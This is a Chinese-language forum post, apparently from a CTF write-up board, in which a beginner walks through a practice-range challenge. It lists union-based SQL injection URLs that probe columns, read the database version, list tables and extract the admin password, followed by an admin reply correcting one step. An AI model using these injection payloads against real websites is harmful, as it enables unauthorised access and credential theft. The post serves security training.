第一题 小白完整攻略

houwentao   ·   发表于 2018-05-17 15:04:23   ·   CTF&WP专版

看完了 7ling老师的教程 就开始手痒了~~~ 想做一做 骇客过把瘾


首先进入靶场 登陆

ps: 这个 PY交易  随便你点那个都是  关闭 框的作用


这里进入

蓝色框  :是做题的链接
黄色框  :是提交答案(PS:这里有坑  就是随便点增加的提交错误flag)
红色框  :是题目 
PS:记得看读题   通过sql注入要拿到管理员密码!!!  我当时就这么想的 首先要找到管理员  然后找到管理密码    


点击蓝框内容后

打开后很快我就看到  左下角有一个点击查看新闻1
这个时候就看我们的 网络地址变化了 http://120.203.13.111:6815 变成http://120.203.13.111:6815/?id=1


不要就纠结这些 语句  都是 有sql 服务器 对应的


http://120.203.13.111:6815/?id=1 and 1=2 UNION SELECT 1,2

 查出 sql服务器有多少个字段


http://120.203.13.111:6815/?id=1 and 1=2 UNION SELECT 1,version()

sql服务器 版本


and 1=2 UNION SELECT 1,table_name from information_schema.tables where table_schema=database()

sql服务器 是否存在admin 这个用户


http://120.203.13.111:6815/?id=1 and 1=2 UNION SELECT 1,password from admin

admin 这个用户密码


然后就恭喜看着段的朋友 找到flag


总结一下 这个题我获得的知识是    通过 网络  和sql 语句  就可以收集到一些信息 : 字段数, 服务器版本 ,是否有这个admin用户,制定用户密码


谢谢大家


打赏我,让我更有动力~

1 Reply   |  Until 2018-5-18 | 1347 View

admin
发表于 2018-5-18

good!金币奖励!

http://120.203.13.111:6815/?id=1 and 1=2 UNION SELECT 1,2
 查出 sql服务器有多少个字段

这里有问题。union select可不是查询字段的哦。期待楼主补充

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.